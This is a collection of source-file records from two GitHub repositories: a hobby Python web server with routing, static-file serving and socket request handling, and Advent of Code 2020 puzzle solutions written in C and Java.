str(kwargs)\n if key not in cache:\n cache[key] = func(*args, **kwargs)\n return cache[key]\n\n return momoizer\n"
},
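A quick usage sketch for the memoize decorator above: its key is built from str(args) + str(kwargs), so a second call with the same arguments skips the function body entirely.

import time

@memoize
def slow_square(n):
    time.sleep(0.1)        # stand-in for expensive work
    return n * n

t0 = time.perf_counter(); slow_square(12); warm = time.perf_counter() - t0
t0 = time.perf_counter(); slow_square(12); cached = time.perf_counter() - t0
assert cached < warm       # second call is served from the cache
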
{
"alpha_fraction": 0.5523710250854492,
"alphanum_fraction": 0.5541948676109314,
"avg_line_length": 26.028169631958008,
"blob_id": "76c0bd1ce276c8909bca8233496b0f143c46d048",
"content_id": "31c6973000c3a4b3a11c94aac93f5d9ba9ccb2c0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3918,
"license_type": "no_license",
"max_line_length": 101,
"num_lines": 142,
"path": "/router/router.py",
"repo_name": "uiandwe/python_web_server",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# https://www.slideshare.net/kwatch/how-to-make-the-fastest-router-in-python\nimport os\nimport sys\nsys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__))))\n\nimport re\nimport types\n\nfrom logger import Logger\nfrom utils.klass.singleton import Singleton\nfrom utils.decorator.memoization import Memoized\nfrom http_handler.render import StaticFileHandler\n\nLOG = Logger().log\n\n\n__all__ = (\n 'Router', 'StaticHandler'\n)\n\n\ndef prefix_str(s):\n return s.split('{', 1)[0]\n\n\ndef replace_params_rexp(path):\n\n # int 정규형\n replace_path = re.sub('\\{\\w*:int\\}', '\\d*', path)\n # str 정규형\n replace_path = re.sub('\\{\\w*:str\\}', '\\w*', replace_path)\n\n return re.compile(replace_path)\n\n\nSTATIC_FOLDER = \"/static/\"\n\n\n# TODO warrning 처리 하기\nclass Router(object, metaclass=Singleton):\n __slots__ = [\"mapping_list\", \"mapping_dict\"]\n\n def __init__(self, mapping):\n self.mapping_list = []\n self.mapping_dict = {}\n for path, funcs in mapping:\n\n if '{' not in path:\n self.set_head_method(funcs)\n self.mapping_dict[path] = (funcs, [])\n continue\n\n prefix = prefix_str(path)\n regx_path = replace_params_rexp(path)\n\n self.mapping_list.append((prefix, regx_path, path, funcs))\n\n @Memoized\n def lookup(self, req_method: str, req_path: str) -> tuple:\n \"\"\"\n 요청된 method / path 에 맞는 api 객체 반환\n \"\"\"\n\n if req_path.startswith(STATIC_FOLDER) and req_method == 'GET':\n return StaticHandler.do_index, []\n\n path_dict = self.mapping_dict.get(req_path)\n\n if path_dict:\n funcs, parms = path_dict\n func = funcs.get(req_method)\n return func, []\n\n for prefix, regx_path, path, funcs in self.mapping_list:\n if not req_path.startswith(prefix):\n continue\n\n path_match = regx_path.match(req_path)\n\n if not path_match:\n continue\n\n req_params = []\n path_split = path.split(\"/\")\n req_path_split = req_path.split(\"/\")\n\n if len(path_split) != len(req_path_split):\n continue\n\n for origin_data, req_data in zip(path_split, req_path_split):\n if origin_data == req_data:\n continue\n\n parameter_name, parameter_type = re.search(\"\\{(\\w*):(\\w*)\\}\", origin_data).groups()\n data = types.SimpleNamespace(name=parameter_name, type=parameter_type, data=req_data)\n req_params.append(data)\n\n func = funcs.get(req_method)\n return func, req_params\n\n return None, None\n\n def set_head_method(self, funcs: dict):\n \"\"\"\n get 메소드가 있을 경우, head 메소드 추가\n \"\"\"\n\n if 'GET' not in funcs.keys():\n return\n\n if isinstance(funcs['GET'], types.FunctionType): # function\n module_name = funcs['GET'].__module__\n class_name = funcs['GET'].__qualname__\n func_name = funcs['GET'].__name__\n\n api_import = __import__(module_name, globals(), locals(), [], 0)\n file_name = module_name.split(\".\")[-1]\n class_name = class_name.replace(\".\" + func_name, \"\")\n\n method_to_call = getattr(api_import, file_name)\n class_call = getattr(method_to_call, class_name)\n\n funcs['HEAD'] = class_call.do_head\n\n else: # method\n pass\n\n return\n\n\nclass StaticHandler:\n \"\"\"\n static 파일 요청 핸들러\n \"\"\"\n @staticmethod\n def do_index(req):\n static_file_path = req.url.replace(STATIC_FOLDER, \"\").split(\"/\")\n file_name = static_file_path[-1]\n file_path = static_file_path[:-1]\n\n return StaticFileHandler(os.path.join(*file_path), file_name)()\n"
},
{
"alpha_fraction": 0.5758450031280518,
"alphanum_fraction": 0.5766693949699402,
"avg_line_length": 25.955554962158203,
"blob_id": "06b10ca1f0b007986b15c8ae53c26b8f20c94add",
"content_id": "7c789949ddaf18177b8bf64f6bd51001fd2a2e76",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2440,
"license_type": "no_license",
"max_line_length": 96,
"num_lines": 90,
"path": "/http_handler/render.py",
"repo_name": "uiandwe/python_web_server",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nimport os\n\nTEMPLATE_FOLDER = \"template\"\nSTATIC_FOLDER = \"static\"\n\n\nclass FolderError(Exception):\n __slots__ = ['msg']\n\n def __init__(self, msg='folder not find'):\n self.msg = msg\n\n def __str__(self):\n return self.msg\n\n\nclass FileError(Exception):\n __slots__ = ['msg']\n\n def __init__(self, msg='File not find'):\n self.msg = msg\n\n def __str__(self):\n return self.msg\n\n\nclass FileImp:\n __slots__ = [\"folder_path\", \"file_name\", \"default_path\"]\n\n def __init__(self, default_path,\n folder_path,\n file_name):\n self.folder_path = folder_path\n self.file_name = file_name\n self.default_path = default_path\n\n def __repr__(self):\n return \"{} {} {}\".format(self.default_path, self.folder_path, self.file_name)\n\n def exist_folder(self) -> bool:\n return os.path.isdir(os.path.join(self.default_path, self.folder_path))\n\n def exist_file(self) -> bool:\n return os.path.exists(os.path.join(self.default_path, self.folder_path, self.file_name))\n\n def read_file(self) -> str:\n file_path = os.path.join(self.default_path, self.folder_path, self.file_name)\n with open(file_path, encoding='utf8') as f:\n contents = f.read()\n return contents\n\n\n# TODO 템플릿 언어 적용\nclass RenderHandler(FileImp):\n def __init__(self, folder_path: str, file_name: str):\n super().__init__(TEMPLATE_FOLDER, folder_path, file_name)\n\n def __call__(self, *args, **kwargs):\n\n if self.exist_folder() is False:\n raise FolderError\n\n if self.exist_file() is False:\n raise FileError\n\n return self.read_file()\n\n\nclass StaticFileHandler(FileImp):\n def __init__(self, folder_path: str, file_name: str):\n super().__init__(STATIC_FOLDER, folder_path, file_name)\n\n def __call__(self, *args, **kwargs):\n\n if self.exist_folder() is False:\n raise FolderError\n\n if self.exist_file() is False:\n raise FileError\n\n if self.file_name.lower().endswith(('.png', '.jpg', '.jpeg', '.tiff', '.bmp', '.gif')):\n return self.read_image_file()\n else:\n return self.read_file()\n\n def read_image_file(self) -> str:\n file_path = os.path.join(self.default_path, self.folder_path, self.file_name)\n stream = open(file_path, \"rb\")\n return stream.read()\n"
},
{
"alpha_fraction": 0.5795207023620605,
"alphanum_fraction": 0.5838779807090759,
"avg_line_length": 18.95652198791504,
"blob_id": "5b1a8e1f483b770fcbc767cba3f6f70f8310086c",
"content_id": "7e0ac7b1319a5ba179533db02d4524dbdd5a0398",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 553,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 23,
"path": "/main.py",
"repo_name": "uiandwe/python_web_server",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\n# TODO test 로직 추가 하기\n# TODO .env 상수 적용하기\n# TODO 미들웨어 구현하기\n# TODO cache 구현\n# -------------------- WAS ------------------------\n# TODO http method 구현하기\n# TODO wsgi 호환\n# TODO weakref 객체 확인하기\n# TODO 초기 파라미터 셋팅 (debug, log, template 등)\n# TODO CORS 구현\n# TODO http2 적용\n\nfrom http_handler.web_server import WebServer\nfrom logger import Logger\n\nLOG = Logger().log\n\nif __name__ == '__main__':\n LOG.info(\"server start!!!\")\n\n WebServer()()\n"
},
{
"alpha_fraction": 0.5599400401115417,
"alphanum_fraction": 0.5644355416297913,
"avg_line_length": 26.677419662475586,
"blob_id": "0c551eb4f132529572361e1e38f7f0e8c4d90d9c",
"content_id": "d7f1e11720a21a495edc49781946ed5084777cd4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6034,
"license_type": "no_license",
"max_line_length": 112,
"num_lines": 217,
"path": "/http_handler/handle.py",
"repo_name": "uiandwe/python_web_server",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nimport selectors\nfrom operator import eq\n\nfrom http_handler import HTTPStatus\nfrom http_handler.urls import router\nfrom logger import Logger\nfrom parser.parser import ParserHttp\nfrom utils import args_to_str, string_to_byte\nfrom utils.decorator.memoization import LRU\n\nLOG = Logger().log\n\nresponses_code = {\n v.value: (v.phrase, v.description) for v in HTTPStatus.__members__.values()\n}\n\n__all__ = (\n 'Handle',\n 'RequestHandler',\n 'ResponseHandler'\n)\n\ndefault_headers = [('Accept-Charset', 'utf-8')]\n\n\nclass ServerError(Exception):\n __slots__ = ['msg']\n\n def __init__(self, msg='server error'):\n self.msg = msg\n\n def __str__(self):\n return self.msg\n\n\n# TODO 상황별 http code 로직 추가\n\n\nclass Handle:\n\n __slots__ = [\"selector\", \"sock\", \"addr\", \"_recv_buffer\", \"_send_buffer\", \"_json_header_len\", \"request\"]\n\n def __init__(self, selector, sock, addr):\n self.selector = selector\n self.sock = sock\n self.addr = addr\n self._recv_buffer = b\"\"\n self._send_buffer = b\"\"\n self._json_header_len = None\n self.request = None\n\n def process_events(self, mask):\n if mask & selectors.EVENT_READ:\n self.read()\n if mask & selectors.EVENT_WRITE:\n self.write()\n\n def read(self):\n self._read()\n\n if self._recv_buffer:\n req_line, request_headers = ParserHttp()(self._recv_buffer)\n self.request = RequestHandler(req_line, request_headers)\n LOG.info(self.request)\n\n # only HTTP or 1.0 이하는 에러\n if self.request is None or not self.request.protocol.startswith(\"HTTP/\") or \\\n self.request.version < ('1', '0'):\n self.send_error(self.request.protocol, 400, default_headers)\n\n # TODO body 확인\n\n def _read(self):\n try:\n data = self.sock.recv(4096)\n except BlockingIOError:\n pass\n else:\n if data:\n self._recv_buffer += data\n else:\n raise RuntimeError(\"Peer closed.\")\n\n def write(self):\n\n if not self.request or not self.request.method or not self.request.url:\n return\n\n try:\n self.request.handler = router.lookup(self.request.method, self.request.url)\n self._write(self.request)\n except Exception as e:\n LOG.error(repr(e))\n raise ServerError\n\n def _write(self, request):\n if not self._recv_buffer:\n self.send_error(self.request, 400)\n\n elif eq(request.handler, (None, None)):\n self.send_error(self.request, 404)\n\n else:\n try:\n ret_data = self.get_response_data(request)\n\n response_data = ResponseHandler(request, 200, ret_data)()\n\n LOG.info(response_data)\n\n self.send(response_data)\n except Exception as e:\n LOG.error(repr(e))\n self.send_error(self.request, 400)\n\n self.close()\n\n @LRU()\n def get_response_data(self, request):\n ret_data = ''\n api_handler, params = request.handler\n\n if api_handler is None:\n return ret_data\n\n ret_data = api_handler(request)\n\n if ret_data is None:\n raise ServerError\n\n return ret_data\n\n def send(self, send_data):\n try:\n self.sock.send(string_to_byte(send_data))\n except BlockingIOError:\n pass\n except Exception as e:\n LOG.error(repr(e))\n\n def send_error(self, request, code):\n res_data = ResponseHandler(request, code, '')()\n self.send(res_data)\n self.request = None\n\n def close(self):\n LOG.info(args_to_str(\"closing connection to\", self.addr))\n try:\n self.selector.unregister(self.sock)\n except Exception as e:\n LOG.error(repr(e))\n\n try:\n self.sock.close()\n except OSError as e:\n LOG.error(repr(e))\n finally:\n self.sock = None\n\n\nclass RequestHandler:\n __slots__ = [\"method\", \"url\", \"protocol\", \"version\", \"params\", \"headers\", 
\"body\", \"handler\", \"content_type\"]\n\n def __init__(self, request_line, request_headers):\n self.method = request_line['method']\n self.url = request_line['url']\n self.protocol = request_line['protocol']\n self.version = request_line['version']\n self.params = request_line['params']\n self.headers = request_headers\n self.body = None\n self.handler = None\n self.content_type = request_line['content_type']\n\n def __repr__(self):\n return \"{} {} {} {}\".format(self.__class__, self.method, self.url, self.params)\n\n\nclass ResponseHandler:\n\n __slots__ = [\"code\", \"message\", \"protocol\", \"headers_buffer\", \"body\"]\n\n def __init__(self, request, code, body):\n self.code = code\n self.message = responses_code[code][0]\n self.protocol = request.protocol\n self.body = '' if body is None else body\n self.headers_buffer = self.set_headers((\"content-type\", request.content_type))\n\n self.headers_buffer.append(\"\\r\\n\")\n\n def __call__(self, *args, **kwargs) -> str:\n\n _wfile = \"{} {} {}\".format(self.protocol, self.code, self.message)\n _wfile += \"\\r\\n\"\n _wfile += \"\".join(self.headers_buffer)\n\n if len(self.body) > 0:\n _wfile += \"{}\\r\\n\".format(self.body)\n return _wfile\n\n def set_headers(self, content_type) -> list:\n\n headers_buffer = []\n\n for keyword, value in default_headers:\n headers_buffer.append((\"{}: {}\\r\\n\".format(keyword, value)))\n\n key, val = content_type\n headers_buffer.append(\"{}: {}\\r\\n\".format(key, val))\n headers_buffer.append(\"{}: {}\\r\\n\".format('Accept-Ranges', 'bytes'))\n\n content_len = len(self.body)\n headers_buffer.append(\"{}: {}\\r\\n\".format('Content-Length', content_len))\n\n return headers_buffer\n"
}
] | 18 |
kstrahilova/AdventOfCode2020Public
|
https://github.com/kstrahilova/AdventOfCode2020Public
|
4ddf725a0eae407dd85b56d051af6d0ec4840684
|
48ef996951a440eef004fd28e300702ecd2a2519
|
27725c6d7450a9c3ce1fde156fb8fb680eed32f8
|
refs/heads/main
| 2023-02-03T05:21:47.932992 | 2020-12-21T18:19:49 | 2020-12-21T18:19:49 | 317,956,170 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5116924047470093,
"alphanum_fraction": 0.5287356376647949,
"avg_line_length": 26.72527503967285,
"blob_id": "5d1ea7a53086bec1880492a15495897e4f669c0e",
"content_id": "369926ca9f8293d4e2b2f19c56fa5b0e6211caa1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 2523,
"license_type": "no_license",
"max_line_length": 159,
"num_lines": 91,
"path": "/Challenge2.c",
"repo_name": "kstrahilova/AdventOfCode2020Public",
"src_encoding": "UTF-8",
"text": "#include <stdio.h>\n#include <string.h>\n#include <errno.h>\n#include <limits.h>\n#include <stdbool.h>\n#include <stdlib.h>\n\nstatic void process_entry_policy_1(char * entry, int * n) {\n //printf(\"entry is %s\\n\", entry);\n\n char condition;\n int total = 0;\n char * rest;\n int at_least = strtol(entry, &rest, 10);\n //printf(\"at_least is %d\\n\", at_least);\n //printf(\"rest is %s\\n\", rest);\n int at_most = -1 * strtol(rest, &rest, 10);\n //printf(\"at_most is %d\\n\", at_most);\n //printf(\"rest is %s\\n\", rest);\n\n for (int i = 0; i < strlen(rest); i++) {\n\n if (rest[i] == ':') {\n condition = rest[i - 1];\n //printf(\"condition is %c\\n\", condition);\n } else if (rest[i] == condition) {\n total = total + 1;\n }\n //printf(\"rest[%d] is %c\\n\", i, rest[i]);\n }\n\n //printf(\"total = %d\\n\", total);\n if (total >= at_least && total <= at_most) {\n *n = *n + 1;\n }\n //printf(\"n is equal to %d\\n\", *n);\n}\n\nstatic void process_entry_policy_2(char * entry, int * n) {\n //printf(\"entry is %s\\n\", entry);\n\n char condition;\n int total = 0;\n char * rest;\n //add -1 at end because they start counting at 1\n int index1 = strtol(entry, &rest, 10) - 1;\n int index2 = -1 * strtol(rest, &rest, 10) - 1;\n int start;\n\n for (int i = 0; i < strlen(rest); i++) {\n\n if (rest[i] == ':') {\n condition = rest[i - 1];\n //printf(\"condition is %c\\n\", condition);\n start = i + 2;\n break;\n }\n }\n\n //printf(\"total = %d\\n\", total);\n\n //printf(\"Letter at the first index is %c and on the second %c\\n\", rest[start + index1], rest[start + index2]);\n if ((rest[start + index1] == condition && rest[start + index2] != condition) || (rest[start + index1] != condition && rest[start + index2] == condition)) {\n *n = *n + 1;\n }\n //printf(\"n is equal to %d\\n\", *n);\n}\n\nint main() {\n FILE *input;\n input = fopen(\"inputChallenge2.txt\", \"r\");\n\n //arbitrarily set\n int max = 1001;\n int n_correct = 0;\n char entry[max];\n\n\n //while the strings are the same, and we have successfully read an entry\n //while (strcmp(fgets(entry, max, input), entry) == 0) {\n while (fgets(entry, max, input) != NULL) {\n process_entry_policy_2(entry, &n_correct);\n }\n\n printf(\"Number of correct passwords is %d\\n\", n_correct);\n\n /*int close_status = fclose(input);\n if (close_status == -1) {\n perror(\"Could not close the file\");\n }*/\n}\n"
},
{
"alpha_fraction": 0.5125795602798462,
"alphanum_fraction": 0.516217052936554,
"avg_line_length": 32.663265228271484,
"blob_id": "f3c03c9a1e67e91d5f397c76563e12f402221d96",
"content_id": "ecb7c5a22c156e10f9ae10c91a1112b1df97f7f3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 3299,
"license_type": "no_license",
"max_line_length": 100,
"num_lines": 98,
"path": "/Challenge9/src/Main.java",
"repo_name": "kstrahilova/AdventOfCode2020Public",
"src_encoding": "UTF-8",
"text": "import java.io.File;\nimport java.io.FileNotFoundException;\nimport java.math.BigInteger;\nimport java.util.ArrayList;\nimport java.util.Collections;\nimport java.util.List;\nimport java.util.Scanner;\n\n//TODO: FOR PART II: BACKTRACKING - WE WANT TO FIND ALL POSSIBLE SUBSETS AND CHECK THEIR SUMS\npublic class Main {\n\n private static boolean checkSumOfSubset(List<BigInteger> subset, BigInteger target) {\n BigInteger sum = new BigInteger(\"0\");\n for (BigInteger number : subset) {\n sum = sum.add(number);\n }\n\n return sum.equals(target);\n }\n\n private static BigInteger checkSumOfAllSubsets(ArrayList<BigInteger> input, BigInteger target) {\n for (int size = 1; size <= input.size(); size++) {\n //if excl: + 1\n for (int i = 0; i < input.size() - size; i++) {\n List<BigInteger> subset = input.subList(i, i + size + 1);\n if (checkSumOfSubset(subset, target)) {\n return Collections.min(subset).add(Collections.max(subset));\n }\n }\n }\n\n return null;\n }\n\n private static boolean check_number(ArrayList<BigInteger> preamble, BigInteger number) {\n for (int i = 0; i < preamble.size(); i++) {\n for (int j = i; j < preamble.size(); j++) {\n if (preamble.get(i).add(preamble.get(j)).equals(number)) {\n return true;\n }\n }\n }\n\n return false;\n }\n public static void main(String[] args) {\n BigInteger first_invalid = new BigInteger(\"0\");\n //PART I\n ArrayList<BigInteger> preamble = new ArrayList<>();\n try {\n File input = new File(\"inputChallenge9.txt\");\n Scanner myReader = new Scanner(input);\n while (myReader.hasNextLine()) {\n String row = myReader.nextLine();\n\n if (!row.equals(\"\")) {\n BigInteger newNumber = new BigInteger(row);\n\n if (preamble.size() == 25) {\n boolean valid = check_number(preamble, newNumber);\n if (!valid) {\n first_invalid = newNumber;\n System.out.println(\"Result Part I: \" + newNumber);\n break;\n }\n preamble.remove(0);\n }\n\n preamble.add(newNumber);\n }\n }\n } catch (FileNotFoundException e) {\n e.printStackTrace();\n }\n\n //PART II\n ArrayList<BigInteger> input_numbers = new ArrayList<>();\n try {\n File input = new File(\"inputChallenge9.txt\");\n Scanner myReader = new Scanner(input);\n while (myReader.hasNextLine()) {\n String row = myReader.nextLine();\n\n if (!row.equals(\"\")) {\n BigInteger newNumber = new BigInteger(row);\n input_numbers.add(newNumber);\n }\n }\n } catch (FileNotFoundException e) {\n e.printStackTrace();\n }\n\n BigInteger result = checkSumOfAllSubsets(input_numbers, first_invalid);\n\n System.out.println(\"Result Part II: \" + result);\n\n }\n}\n"
},
{
"alpha_fraction": 0.5036858320236206,
"alphanum_fraction": 0.5072299242019653,
"avg_line_length": 35.17435836791992,
"blob_id": "2514e128f8d6adf537a7282ed38e3baeae262956",
"content_id": "f03779fce086ea133c3d98e2f747910ee6e63655",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 7054,
"license_type": "no_license",
"max_line_length": 127,
"num_lines": 195,
"path": "/Challenge16/src/Main.java",
"repo_name": "kstrahilova/AdventOfCode2020Public",
"src_encoding": "UTF-8",
"text": "import java.io.File;\nimport java.io.FileNotFoundException;\nimport java.math.BigInteger;\nimport java.util.*;\n\npublic class Main {\n\n private static ArrayList<Integer> valid_values_Part_I;\n private static int invalid;\n private static HashMap<String, ArrayList<Integer>> valid_values;\n private static HashMap<String, ArrayList<Integer>> possible_indices;\n private static String my_ticket;\n\n private static ArrayList <Integer> removeDuplicates(ArrayList<Integer> list) {\n LinkedHashSet<Integer> hashSet = new LinkedHashSet<>(list);\n return new ArrayList<>(hashSet);\n }\n\n private static void process_notes_Part_I(String entry) {\n String[] words = entry.split(\" \");\n\n for (String word : words) {\n if (word.contains(\"-\")) {\n Integer lowerBound = Integer.parseInt(word.split(\"-\")[0]);\n Integer upperBound = Integer.parseInt(word.split(\"-\")[1]);\n while (lowerBound <= upperBound) {\n valid_values_Part_I.add(lowerBound);\n lowerBound++;\n }\n }\n }\n\n }\n\n private static void process_row_Part_I(String entry) {\n String[] values = entry.split(\",\");\n for (String value : values) {\n if (!valid_values_Part_I.contains(Integer.parseInt(value))){\n invalid = invalid + Integer.parseInt(value);\n }\n }\n }\n\n private static void initialize_possible_indices() {\n possible_indices = new HashMap<>();\n\n int n = valid_values.size();\n\n for (Map.Entry entry : valid_values.entrySet()) {\n possible_indices.put((String) entry.getKey(), new ArrayList<>());\n for (int i = 0; i < n; i++) {\n possible_indices.get(entry.getKey()).add(i);\n }\n\n }\n }\n\n private static boolean valid_ticket(String entry) {\n String[] values = entry.split(\",\");\n if (values.length != valid_values.size()) {\n return false;\n }\n\n for (String value : values) {\n if (!valid_values_Part_I.contains(Integer.parseInt(value))){\n return false;\n }\n }\n return true;\n }\n\n private static void process_notes_Part_II(String entry) {\n String[] words = entry.split(\":\");\n String[] numberRanges = words[1].split(\" \");\n ArrayList<Integer> number_values = new ArrayList<>();\n\n for (String word : numberRanges) {\n if (word.contains(\"-\")) {\n Integer lowerBound = Integer.parseInt(word.split(\"-\")[0]);\n Integer upperBound = Integer.parseInt(word.split(\"-\")[1]);\n while (lowerBound <= upperBound) {\n number_values.add(lowerBound);\n lowerBound++;\n }\n }\n }\n\n valid_values.put(words[0], number_values);\n }\n\n private static void process_row_Part_II(String entry) {\n String[] ticket_values = entry.split(\",\");\n for (int i = 0; i < ticket_values.length; i++) {\n for (Map.Entry valid_value_range : valid_values.entrySet()) {\n if (!((ArrayList) valid_value_range.getValue()).contains(Integer.parseInt(ticket_values[i]))){\n ((ArrayList) possible_indices.get(valid_value_range.getKey())).remove((Integer) i);\n }\n }\n }\n }\n\n private static void get_final_indices() {\n int counter = 0;\n for (Map.Entry entry : possible_indices.entrySet()) {\n counter = counter + ((ArrayList)entry.getValue()).size();\n }\n\n while (counter > possible_indices.size()) {\n for (Map.Entry entry : possible_indices.entrySet()) {\n if (((ArrayList)entry.getValue()).size() == 1) {\n for (Map.Entry entry1 : possible_indices.entrySet()) {\n if (((ArrayList)entry1.getValue()).contains(((ArrayList)entry.getValue()).get(0)) && entry != entry1) {\n //System.out.println(((ArrayList) entry.getValue()).get(0));\n ((ArrayList)entry1.getValue()).remove(((ArrayList)entry.getValue()).get(0));\n }\n }\n counter = counter - 1;\n //break;\n }\n }\n 
}\n }\n\n private static BigInteger process_my_ticket() {\n BigInteger result = new BigInteger(\"1\");\n String[] ticket = my_ticket.split(\",\");\n for (Map.Entry field : possible_indices.entrySet()) {\n String[] name = ((String) field.getKey()).split(\" \");\n if (name.length == 1) {\n continue;\n }\n\n if (name[0].equals(\"departure\")) {\n result = result.multiply(new BigInteger(ticket[(int) ((ArrayList) field.getValue()).get(0)]));\n }\n }\n\n return result;\n }\n\n public static void main(String[] args) {\n valid_values_Part_I = new ArrayList<>();\n valid_values = new HashMap<>();\n invalid = 0;\n boolean nearbyTickets = false;\n boolean myTicket = false;\n try {\n File input = new File(\"inputChallenge16.txt\");\n Scanner myReader = new Scanner(input);\n while (myReader.hasNextLine()) {\n String row = myReader.nextLine();\n if (row.equals(\"your ticket:\")) {\n myTicket = true;\n } else if (row.equals(\"nearby tickets:\")) {\n myTicket = false;\n nearbyTickets = true;\n //Part I stuff\n valid_values_Part_I = removeDuplicates(valid_values_Part_I);\n Collections.sort(valid_values_Part_I);\n //Part II stuff\n initialize_possible_indices();\n } else if (!row.equals(\"\") && myTicket) {\n my_ticket = row;\n } else if (!row.equals(\"\") && nearbyTickets) {\n //Part I stuff\n process_row_Part_I(row);\n //Part II stuff\n if (valid_ticket(row)) {\n process_row_Part_II(row);\n }\n } else if (!row.equals(\"\")) {\n process_notes_Part_I(row);\n process_notes_Part_II(row);\n }\n }\n\n get_final_indices();\n\n for (Map.Entry entry : possible_indices.entrySet()) {\n System.out.println(entry.getKey());\n for (Object indices : (ArrayList) entry.getValue()) {\n System.out.println(indices);\n }\n }\n\n System.out.println();\n System.out.println(\"Result Part I: \" + invalid);\n BigInteger result = process_my_ticket();\n System.out.println(\"Result Part II: \" + result);\n\n } catch (FileNotFoundException e) {\n e.printStackTrace();\n }\n }\n}\n"
},
{
"alpha_fraction": 0.5206896662712097,
"alphanum_fraction": 0.5396551489830017,
"avg_line_length": 26.294116973876953,
"blob_id": "9984bba2b3eaeb543ef63cd02e019362d0647820",
"content_id": "955ef76b275fb2b6edea5ec30a5599d03bb4fafb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 4640,
"license_type": "no_license",
"max_line_length": 175,
"num_lines": 170,
"path": "/Challenge5.c",
"repo_name": "kstrahilova/AdventOfCode2020Public",
"src_encoding": "UTF-8",
"text": "//first 7 chars describe the row and are \\in {F, B},\n//eqivalent to {0, 1}\n//FBFBBFF = 0101100 = 44, so row 44;\n//last 3 chars describe the column and are \\in {L, R},\n//eqivalent to {0, 1}\n//RLR = 101 = 5, so 5th column\n// SEAT_ID = row# * 8 + column#\n\n//What is the highest seat ID?\n\n//TODO: functions that compute the row, the column and thenthe seat id; loop over all entries and compare\n\n#include <stdio.h>\n#include <string.h>\n#include <errno.h>\n#include <limits.h>\n#include <stdbool.h>\n#include <stdlib.h>\n#include <math.h>\n\n//array is stolen\ntypedef struct {\n int *array;\n size_t used;\n size_t size;\n} Array;\n\nvoid initArray(Array *a, size_t initialSize) {\n a->array = malloc(initialSize * sizeof(int));\n a->used = 0;\n a->size = initialSize;\n}\n\nvoid insertArray(Array *a, int element) {\n // a->used is the number of used entries, because a->array[a->used++] updates a->used only *after* the array has been accessed.\n // Therefore a->used can go up to a->size\n if (a->used == a->size) {\n a->size *= 2;\n a->array = realloc(a->array, a->size * sizeof(int));\n }\n a->array[a->used++] = element;\n}\n\nvoid freeArray(Array *a) {\n free(a->array);\n a->array = NULL;\n a->used = a->size = 0;\n}\n\n//so is sorting\nvoid swap(int* xp, int* yp)\n{\n int temp = *xp;\n *xp = *yp;\n *yp = temp;\n}\n\n// Function to perform Selection Sort\nvoid selectionSort(int arr[], int n)\n{\n int i, j, min_idx;\n\n // One by one move boundary of unsorted subarray\n for (i = 0; i < n - 1; i++) {\n\n // Find the minimum element in unsorted array\n min_idx = i;\n for (j = i + 1; j < n; j++)\n if (arr[j] < arr[min_idx])\n min_idx = j;\n\n // Swap the found minimum element\n // with the first element\n swap(&arr[min_idx], &arr[i]);\n }\n}\n\nint compute_row(char * entry) {\n int result = 0;\n int digit = -1;\n for (int i = strlen(entry) - 4; i >= 0; i--) {\n if (entry[i] == 'F') {\n digit = 0;\n } else if (entry[i] == 'B'){\n digit = 1;\n } else {\n perror(\"wrong input\");\n }\n result = result + digit * (int) pow(2.0, 6.0 - (double) i);\n }\n\n //printf(\"result is %d\\n\", result);\n return(result);\n}\n\nint compute_column(char * entry) {\n int result = 0;\n int digit = -1;\n for (int i = strlen(entry) - 1; i >= 7; i--) {\n //printf(\"i is %d and entry[%d] is %c\\n\", i, i, entry[i]);\n if (entry[i] == 'L') {\n digit = 0;\n } else if (entry[i] == 'R'){\n digit = 1;\n } else {\n printf(\"entry is %s, entry[%d] = %c\\n\", entry, i, entry[i]);\n perror(\"wrong input\");\n }\n //printf(\"i = %d, 2^(9 - i) = %d, digit = %d and digit * power = %d\\n\", i, (int) pow(2.0, 9.0 - (double) i), digit, digit * (int) pow(2.0, 9.0 - (double) i));\n result = result + digit * (int) pow(2.0, 9.0 - (double) i);\n }\n //printf(\"result is %d\\n\", result);\n return(result);\n}\n\nint compute_sID(int * row, int * column) {\n return((* row) * 8 + (* column));\n}\n\nint size_of_array(int * array) {\n return sizeof(* array) / sizeof(array[0]);\n}\n\nint find_missing_value(Array seat_IDs) {\n for (int i = 0; i < seat_IDs.used; i ++) {\n if (seat_IDs.array[i] + 1 != seat_IDs.array[i + 1]) {\n return(seat_IDs.array[i] + 1);\n }\n }\n return(-1);\n}\n\nint main() {\n FILE *input;\n input = fopen(\"inputChallenge5.txt\", \"r\");\n int row_length = 11;\n char entry[row_length];\n //since seat_id = row# * 8 + column# and row is \\in [0, 127] and column is \\in [0, 7], the largest possible seat_ID is 128 * 8 + 8\n int max = 0;\n Array seat_IDs;\n initArray(&seat_IDs, 1);\n\n while (fgets(entry, row_length, 
